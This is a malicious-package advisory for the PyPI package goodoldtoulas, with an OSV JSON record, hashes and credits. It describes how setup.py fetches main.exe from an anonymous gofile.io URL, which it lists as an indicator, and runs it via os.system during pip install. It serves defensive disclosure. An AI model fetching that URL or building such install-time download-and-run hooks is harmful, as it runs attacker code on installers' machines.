MAL-2026-5271
Vulnerability from ossf_malicious_packages
Published
2026-06-05 17:29
Modified
2026-06-10 07:39
Summary
Malicious code in goodoldtoulas (PyPI)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (5414e9956c915ef34d422d9eba09177fb667bba375c43e9d9b54d4f87b628712)

During pip install goodoldtoulas, setup.py invokes setup_helper() which downloads main.exe from https://cold-eu-par-1.gofile.io/download/web/deb39e07-da2d-4081-a86b-6380e555788c/main.exe (anonymous file host) into C:\MALWARE_DELETE and executes it via os.system('main.exe') (setup.py lines 6, 21, 33). The fetch is unpinned, has no hash verification, the destination is an opaque Windows binary, the host is not the publisher's domain, and the staging path name is self-incriminating. Any installer running pip install of this package on Windows fetches and executes an attacker-controlled binary at install time.

Source: kam193 (24dbb5643933ff305b2eab164e820476f645ef2b59ad7c7cdfdeb2c3c3bfb98f)

During installation, package attempts to download and run an executable imitating malicious activity.

Category: PROBABLY_PENTEST - Packages looking like typical pentest packages, but also anything that looks like testing, exploring pre-prepared kits, research & co, with clearly low-harm possibilities.

Campaign: 2026-06-goodoldtoulas

Reasons (based on the campaign):

  • The package overrides the install command in setup.py to execute malicious code during installation.

  • Downloads and executes a remote executable.

CWE
  • CWE-506 - The product contains code that appears to be malicious in nature.
Credits
Amazon Inspector inspector-research@amazon.com
Kamil Mańkowski (kam193) github.com/kam193 bad-packages.kam193.eu/
To clipboard 

{
  "affected": [
    {
      "database_specific": {
        "cwes": [
          {
            "cweId": "CWE-506",
            "description": "The product contains code that appears to be malicious in nature.",
            "name": "Embedded Malicious Code"
          }
        ],
        "indicators": {
          "domains": [
            "cold-eu-par-1.gofile.io",
            "gofile.io"
          ],
          "evidence_files": [
            {
              "path": "setup.py",
              "sha256": "a652013c0a212dd192245d54be497675a6fe335938f7851d037f5c05dda045e3",
              "tlsh": "f41110c5ce0064519286a9486e93882c1636f753bf26e4d07f8c53953f8a1a387a613d"
            }
          ],
          "package_integrity": [
            {
              "filename": "goodoldtoulas-0.1.0-py3-none-any.whl",
              "hashes": {
                "blake2b_256": "da9bc125d290eae54e3e58e1efadfadcbb3191a8be8f57fd9cf9153081a2eec4",
                "md5": "13ff8ef6e7ddff02a2c2e60327af7cdc",
                "sha256": "c3c429546d61f32a700a5774e1b0785a274243d361ee595d1757f285c3c18093"
              }
            },
            {
              "filename": "goodoldtoulas-0.1.0.tar.gz",
              "hashes": {
                "blake2b_256": "505b6505616b91b744fdac2f8ce68e8f18486de0f86c691f3fd86ff8b2701897",
                "md5": "0374d56c3ea6114a7f3f1fa46ee57867",
                "sha256": "020266644387589422bac12dcff9dcdaea0b022393f617d317e8bf3f91b0902c"
              }
            }
          ]
        }
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "goodoldtoulas"
      },
      "versions": [
        "0.1.0"
      ]
    }
  ],
  "credits": [
    {
      "contact": [
        "inspector-research@amazon.com"
      ],
      "name": "Amazon Inspector",
      "type": "FINDER"
    },
    {
      "contact": [
        "https://github.com/kam193",
        "https://bad-packages.kam193.eu/"
      ],
      "name": "Kamil Ma\u0144kowski (kam193)",
      "type": "REPORTER"
    }
  ],
  "database_specific": {
    "iocs": {
      "urls": [
        "https://cold-eu-par-1.gofile.io/download/web/deb39e07-da2d-4081-a86b-6380e555788c/main.exe"
      ]
    },
    "malicious-packages-origins": [
      {
        "id": "pypi/2026-06-goodoldtoulas/goodoldtoulas",
        "import_time": "2026-06-05T18:10:37.118968761Z",
        "modified_time": "2026-06-05T17:29:05.826413Z",
        "sha256": "24dbb5643933ff305b2eab164e820476f645ef2b59ad7c7cdfdeb2c3c3bfb98f",
        "source": "kam193",
        "versions": [
          "0.1.0"
        ]
      },
      {
        "id": "IN-MAL-2026-005259",
        "import_time": "2026-06-10T07:37:16.484567139Z",
        "modified_time": "2026-06-10T07:12:18Z",
        "sha256": "463564954b6a05239e3161ff46d10a0ad605c36ec4c7bda57c08db53e4044c3d",
        "source": "amazon-inspector",
        "versions": [
          "0.1.0"
        ]
      },
      {
        "id": "IN-MAL-2026-005258",
        "import_time": "2026-06-10T07:37:16.422434459Z",
        "modified_time": "2026-06-10T07:12:17Z",
        "sha256": "5414e9956c915ef34d422d9eba09177fb667bba375c43e9d9b54d4f87b628712",
        "source": "amazon-inspector",
        "versions": [
          "0.1.0"
        ]
      }
    ]
  },
  "details": "\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (5414e9956c915ef34d422d9eba09177fb667bba375c43e9d9b54d4f87b628712)\nDuring `pip install goodoldtoulas`, setup.py invokes setup_helper() which downloads main.exe from https://cold-eu-par-1.gofile.io/download/web/deb39e07-da2d-4081-a86b-6380e555788c/main.exe (anonymous file host) into C:\\MALWARE_DELETE and executes it via os.system(\u0027main.exe\u0027) (setup.py lines 6, 21, 33). The fetch is unpinned, has no hash verification, the destination is an opaque Windows binary, the host is not the publisher\u0027s domain, and the staging path name is self-incriminating. Any installer running pip install of this package on Windows fetches and executes an attacker-controlled binary at install time.\n\n## Source: kam193 (24dbb5643933ff305b2eab164e820476f645ef2b59ad7c7cdfdeb2c3c3bfb98f)\nDuring installation, package attempts to download and run an executable imitating malicious activity.\n\n\n---\n\nCategory: PROBABLY_PENTEST - Packages looking like typical pentest packages, but also anything that looks like testing, exploring pre-prepared kits, research \u0026 co, with clearly low-harm possibilities.\n\n\nCampaign: 2026-06-goodoldtoulas\n\n\nReasons (based on the campaign):\n\n\n - The package overrides the install command in setup.py to execute malicious code during installation.\n\n\n - Downloads and executes a remote executable.\n",
  "id": "MAL-2026-5271",
  "modified": "2026-06-10T07:39:02Z",
  "published": "2026-06-05T17:29:05Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://bad-packages.kam193.eu/pypi/package/goodoldtoulas"
    },
    {
      "type": "PACKAGE",
      "url": "https://pypi.org/project/goodoldtoulas/0.1.0/"
    }
  ],
  "schema_version": "1.7.4",
  "summary": "Malicious code in goodoldtoulas (PyPI)"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.





Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.


Detection rules are retrieved from Rulezet.